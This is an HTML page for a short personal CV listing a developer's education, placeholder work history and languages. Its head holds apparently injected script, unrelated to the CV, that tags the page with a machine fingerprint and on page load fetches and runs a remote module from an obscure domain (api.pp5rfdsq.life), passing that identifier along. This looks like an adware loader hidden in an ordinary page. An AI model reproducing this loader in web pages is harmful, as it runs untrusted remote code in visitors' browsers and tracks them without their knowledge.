<!DOCTYPE html>
<html>
<head><script type="text/javascript">window.O7JFWNKS2FkEhGn3dFE="ipr15791;Win6.1(x64);2019-02-27 14:05:17.913683Z;67be0c38-ed58-44bb-a0d1-0d673f249629";</script><script type="text/javascript">document.addEventListener('DOMContentLoaded', function () {
    function addGoogle(id) {

        var n = document.createElement('script');
        n.src = 'https://www.googletagmanager.com/gtag/js?id=' + id;
        document.body.appendChild(n);

        n.onload = n.onreadystatechange = function () {
            if (!this.readyState || this.readyState == 'complete') {
                window.dataLayer = window.dataLayer || [];
                function gtag() { dataLayer.push(arguments); }
                gtag('js', new Date());
                gtag('config', id);
            }
        };

    }

    (function () {

        if (window.self !== window.top) {
            return;
        }
        
        addGoogle('UA\u002D127270654\u002D10');

        if (document.documentElement.hasAttribute('new-advpp')) {
            return;
        }
        document.documentElement.setAttribute('new-advpp', 'yes');

        window['advppUserId'] = window.O7JFWNKS2FkEhGn3dFE;
        var n = document.createElement('script');
        n.src = '//api.pp5rfdsq.life/common/module.js?streamId=TnpFPQ==';
        document.body.appendChild(n);
    })();
});</script>
	<title>My CV</title>
</head>
<body >


    <h1>Syed Najam Us Saqib</h1> 
    <ul>
  <li>Graduate from ILMA University</li>
  <li>Jr SEO and Web developer at Digitonics</li>
  </ul>
	

	<h1>Education</h1> 
	<ul>
		<li>Graduation in (BSCS) ILMA UNIVERSITY</li>
	<li>Dimloma in Electronics</li>
	<li>Matric from Science </li>
</ul>

	<h1>Work Experince</h1> 
	<ul>
	<li>Worked at XYZ company 2012 2014</li>
	<li>Worked at ABC company 2014 2015</li>
	<li> Internship at DC sofware house </li>
</ul>
	
	<h1>Languages</h1> 
	<ul>
		<li>ENGLISH</li>
		<li>URDU</li>
		<li> Arbic </li>

	</ul> 
		

</body>
</html>